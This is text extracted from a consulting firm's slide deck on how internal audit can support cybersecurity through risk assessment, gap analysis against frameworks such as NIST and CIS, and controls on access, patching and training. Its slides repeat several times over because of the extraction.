6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
